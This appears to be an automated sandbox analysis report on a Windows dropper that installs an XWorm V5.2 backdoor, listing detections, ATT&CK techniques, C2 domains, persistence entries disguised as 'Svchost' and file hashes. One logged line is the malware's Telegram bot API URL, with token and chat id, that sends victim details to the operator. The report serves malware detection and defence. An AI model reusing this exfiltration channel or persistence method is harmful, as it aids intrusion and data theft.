                      Source: C:\Users\user\AppData\Roaming\X.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Amcache.hve.18.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.18.dr; Binary or memory string: msmpeng.exe
                      Source: Amcache.hve.18.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.18.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: X.exe, 00000002.00000002.2842784193.000000001BAC0000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000002.00000002.2838234849.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.18.dr; Binary or memory string: MsMpEng.exe
                      Source: C:\Users\user\AppData\Roaming\X.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match; File source: 2.0.X.exe.960000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe PID: 1072, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: X.exe PID: 3280, type: MEMORYSTR
                      Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED
                      Source: Yara match; File source: C:\Users\user\AppData\Roaming\X.exe, type: DROPPED

                      Remote Access Functionality

                      Source: Yara match; File source: 2.0.X.exe.960000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe PID: 1072, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: X.exe PID: 3280, type: MEMORYSTR
                      Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED
                      Source: Yara match; File source: C:\Users\user\AppData\Roaming\X.exe, type: DROPPED

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 Scheduled Task/Job | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 21 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 231 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 21 Registry Run Keys / Startup Folder | 141 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 11 Process Injection | NTDS | 141 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | 13 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Software Packing | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
[Behavior graph. Behavior Graph ID: 1387375; Sample: SecuriteInfo.com.Trojan.Mul...; Startdate: 06/02/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe | 72% | Virustotal | | Browse
SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Cassiopeia |
SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe | 100% | Avira | TR/Dropper.Gen |
SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\X.exe | 100% | Avira | HEUR/AGEN.1305769 |
C:\Users\user\AppData\Local\Temp\Svchost.exe | 100% | Avira | HEUR/AGEN.1305769 |
C:\Users\user\AppData\Roaming\X.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\Svchost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\Svchost.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
C:\Users\user\AppData\Local\Temp\Svchost.exe | 77% | Virustotal | | Browse
C:\Users\user\AppData\Roaming\61c7cdb3196df.exe | 11% | ReversingLabs | |
C:\Users\user\AppData\Roaming\61c7cdb3196df.exe | 10% | Virustotal | | Browse
C:\Users\user\AppData\Roaming\X.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
C:\Users\user\AppData\Roaming\X.exe | 77% | Virustotal | | Browse
                      No Antivirus matches
Source | Detection | Scanner | Label | Link
eu-central-7075.packetriot.net | 13% | Virustotal | | Browse
trusting-smoke-90361.pktriot.net | 1% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://schemas.mi | 0% | URL Reputation | safe |
http://schemas.mi | 0% | URL Reputation | safe |
http://passport.net/tb | 0% | URL Reputation | safe |
http://Passport.NET/tb( | 0% | Avira URL Cloud | safe |
http://crl.ver) | 0% | Avira URL Cloud | safe |
trusting-smoke-90361.pktriot.net | 0% | Avira URL Cloud | safe |
http://Passport.NET/tbpose | 0% | Avira URL Cloud | safe |
http://Passport.NET/STS | 0% | Avira URL Cloud | safe |
http://Passport.NET/tb_ | 0% | Avira URL Cloud | safe |
http://Passport.NET/STS | 0% | Virustotal | | Browse
trusting-smoke-90361.pktriot.net | 1% | Virustotal | | Browse
http://Passport.NET/tbpose | 0% | Virustotal | | Browse
http://Passport.NET/tb_ | 0% | Virustotal | | Browse
http://Passport.NET/tb( | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high
eu-central-7075.packetriot.net | 167.71.56.116 | true | false | | unknown
trusting-smoke-90361.pktriot.net | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A99B59929CF3A7C56FB7E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20_68WOMU2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 | false | | high
trusting-smoke-90361.pktriot.net | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                high
                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 00000013.00000003.2822692478.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877702472.000002A0E2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830159057.000002A0E2757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830225661.000002A0E277F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830208486.000002A0E270F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2823074307.000002A0E2753000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830182692.000002A0E2759000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
167.71.56.116 | eu-central-7075.packetriot.net | United States | 14061 | DIGITALOCEAN-ASNUS | false
Joe Sandbox version: 39.0.0 Ruby
Analysis ID: 1387375
Start date and time: 2024-02-06 09:32:18 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@15/12@9/2
EGA Information: Failed
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 98%
                                                                                                                                      • Number of executed functions: 61
                                                                                                                                      • Number of non-executed functions: 1
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, Svchost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 40.126.29.10, 40.126.29.8, 40.126.29.11, 40.126.29.5, 40.126.29.14, 20.190.157.11, 40.126.29.6, 40.126.29.13, 52.182.143.212
                                                                                                                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                      • Execution Graph export aborted for target SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, PID 1072 because it is empty
                                                                                                                                      • Execution Graph export aborted for target X.exe, PID 3280 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
08:33:25 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Svchost C:\Users\user\AppData\Local\Temp\Svchost.exe
08:33:26 | Task Scheduler | Run new task: Svchost path: C:\Users\user\AppData\Local\Temp\Svchost.exe
08:33:33 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Svchost C:\Users\user\AppData\Local\Temp\Svchost.exe
08:33:41 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnk
09:33:26 | API Interceptor | 4283337x Sleep call for process: X.exe modified
09:35:42 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                              • 67.205.184.66
                                                                                                                                                                              http://shjj.ysxo.phestoslevi.online/wr/#?service=bmFzc2ltLmdyaWJpQGNyb3dlLmNvLnVrJnJvYXIyJmM=Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 188.166.216.120
                                                                                                                                                                              Setup (1).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 161.35.127.181
                                                                                                                                                                              Setup (1).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 161.35.127.181
                                                                                                                                                                              S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                              • 164.90.197.162
                                                                                                                                                                              mpsl-20240205-0055.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                              • 159.65.206.21
                                                                                                                                                                              x86_64-20240205-0055.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                              • 157.230.201.3
                                                                                                                                                                              https://ca-net-fix-assistenzaonline.codeanyapp.com/neet/net/net/login.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 45.55.112.74
                                                                                                                                                                              https://t.co/kdpDbpIXphGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.248.10.131
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eHavale_Referans#U0131_0230958PO570304_Tutar_20.000_Euro_pdf_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              an_international_agreement_to_voluntarily_limit_greenhouse_gas_emissions_is_called_the_60718.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              an_international_agreement_to_voluntarily_limit_greenhouse_gas_emissions_is_called_the_60718.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              9hWoCDK60X.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              7abf5ad882fd72332b0b7fb530c8c6505852d4f7ea39edfe444218bdcd9c7f0e_dump.exeGet hashmaliciousGlupteba, SmokeLoader, StealcBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Factura_Proforma-Asesoramiento_Bancario.Pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              https://www.google.com.np/amp/s/www.google.com%2Furl%3Fq%3Dhttps%253A%252F%252Fimmofiplus.com%252Fcgi-bin%252F%26sa%3DD%26sntz%3D1%26usg%3DAOvVaw3plx_rZYk875jSTY_j4-Gb#?im=Y2dhdGVzQGFjYy5vcmc=Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Copia_del_Pagamento__Intesa_Sanpaolo.pdf.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              ujWn3eOza6.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              9dDFUhi7hw.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                              Entropy (8bit):1.434973820107164
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:SHnR5uek081iHy9MaWj8iyX8ClllX9IzuiFDZ24lO8zWnY:qfu281ixa48i/yVSzuiFDY4lO8C
                                                                                                                                                                              MD5:9B83CD8C48A074A6D367FD3270A9E256
                                                                                                                                                                              SHA1:523FB837352381D8D69383F7C3AE86D557CFE445
                                                                                                                                                                              SHA-256:FA6FF03E36F71B61A94772769933B514EB7CFDD34FE6EDF86C1A7E5608114F68
                                                                                                                                                                              SHA-512:5D30B2A302D3192A9D6076230D367B8EA1903DF2B1180902776062FB4269CAEDED98C6F707B4238C14FD0B12EC3F5B1FFFD67056782B66D34F11AF6EE64E5E52
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:Mini DuMP crash report, 16 streams, Tue Feb 6 08:35:37 2024, 0x1205a4 type
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):559183
                                                                                                                                                                              Entropy (8bit):3.0112893927906543
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:uQHum4RhsWRj4cS066QrutPledQ1CCqhP1x8FHzoZYSVJWw53+vBAIWo4yiI1pok:u7SQY065W1qn53QzWoFiI
                                                                                                                                                                              MD5:7E475450ACE996612E0074528694C7C6
                                                                                                                                                                              SHA1:B84FAAE43CECEA25B4504B042E270EED13F482C5
                                                                                                                                                                              SHA-256:6DB8B9E002F7687A112D042CF7E459DC110767958F6BBA208FA2F33DC1AD104D
                                                                                                                                                                              SHA-512:E5DBA756608B59331E7B2513A587FC29D98CFF83CCBF3AC15D22DA87DBEC5EB69684813A34449892EFAE9A7C180227C7ABC444F76E909CB8E79F8108EBC4C309
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6856
                                                                                                                                                                              Entropy (8bit):3.7214820203371124
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:R6l7wVeJgvZVZsIYZN8YprfP89bvNZbfilm:R6lXJQZVtYD0vzbf5
                                                                                                                                                                              MD5:7B1671C1313CF58B46D03A9CC907C8CF
                                                                                                                                                                              SHA1:1AB74728D05BE993287B7FA2A13ECC394CDCC971
                                                                                                                                                                              SHA-256:02AAB5DC9B144A031A28D5D3A1BC8D5F5DE571FCD36C4770A2A6D2D6B409C35D
                                                                                                                                                                              SHA-512:24D4C2EAF12B23EE9CD0B07C58D5721ACEEA7F19327A07F8AD96D3F264E825CCE832289F54E5B63929C3E06481992EF044894C9B3730460C9F0CA3B0B16535AF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4717
                                                                                                                                                                              Entropy (8bit):4.422384087269718
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:cvIwWl8zsXJg771I9eCq5WpW8VY6Ym8M4JbEFPNGyq8vV3Ythd:uIjf5I7FCqI7VmJwNGWRYthd
                                                                                                                                                                              MD5:4768A63EA73736272555164C2B21CA79
                                                                                                                                                                              SHA1:516970A6EDDC8B879849F9ADADA97BD9608A79E8
                                                                                                                                                                              SHA-256:BD77BFC4039A6DE25A24906BB6E311044B945E7BCFB548C5CC5DA84A8EAF9DBC
                                                                                                                                                                              SHA-512:52E545DB2BF376B60C2C91687D10CC1527EEA33B0A3B1B72DAB1EA2E58A107D741F6D70486A55D7946081840143F8C6242A828DB4D5B231A00F7E8B0DD84F10B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):77352
                                                                                                                                                                              Entropy (8bit):3.0736853801486363
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:a2e8IPCwf0ObU17XZm8gTzyYktKI+E++G+doKG+q+OG+uG+H+oSV+P+o+0+t+fEO:a2e8IPCwf0ObU17XZm8gTzyYkKI+E++h
                                                                                                                                                                              MD5:5743EFDB51197701120D439B77AC2D9D
                                                                                                                                                                              SHA1:FC148237ABC8F3CD51B36DC0C3216EF7ABDA201E
                                                                                                                                                                              SHA-256:461A71BEBD2E7AAA07E98E1CFDADB5CD6B475D102AC7D38AB16108C66F4123BD
                                                                                                                                                                              SHA-512:86B15D33CDA2E8794F5380FC0478348F663044A5431D3BEEB330F69ED894D15B02C8C7F995BCE9FBE287DB8F46A5C03FC438933754EAFAFAFAFADE72002D41E8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                              Entropy (8bit):2.685016712028871
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:TiZYWA41DwhhYO6YUWaaH6YEZsdsCtdiGEKyBXwZM2YUaR+BM4vTocIUA3:2ZDA5/6/id68eUaR+BMCTobUA3
                                                                                                                                                                              MD5:BB1D0C9A301FC81108B51F4F8AFCB1C6
                                                                                                                                                                              SHA1:BA65993C8129254DBE791CEA98ABE2E1FDD99F29
                                                                                                                                                                              SHA-256:AE3CE98DBD95A387A51D9022485FE71717D27D91DB9CBF011A1F4023DEA78B60
                                                                                                                                                                              SHA-512:A1746F8C5DCA0C80C8FEDA9874EFEA2A6585760327E2B2E5CA2BA1AC9228AD64085B5F4C8B87990EAA478A764BB28CE82BBB3184B650CE5A2A43528B6395C19D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):654
                                                                                                                                                                              Entropy (8bit):5.380476433908377
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\X.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                              Entropy (8bit):5.5767765436987435
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:zDf+ZLVzkPLie7Vs6Ji5YYFg9KDO/hg/l193T:f+PzILv7di/Fg9KDO/Cd1dT
                                                                                                                                                                              MD5:F57EC853B0F01B0E9954CFBF8FEEB081
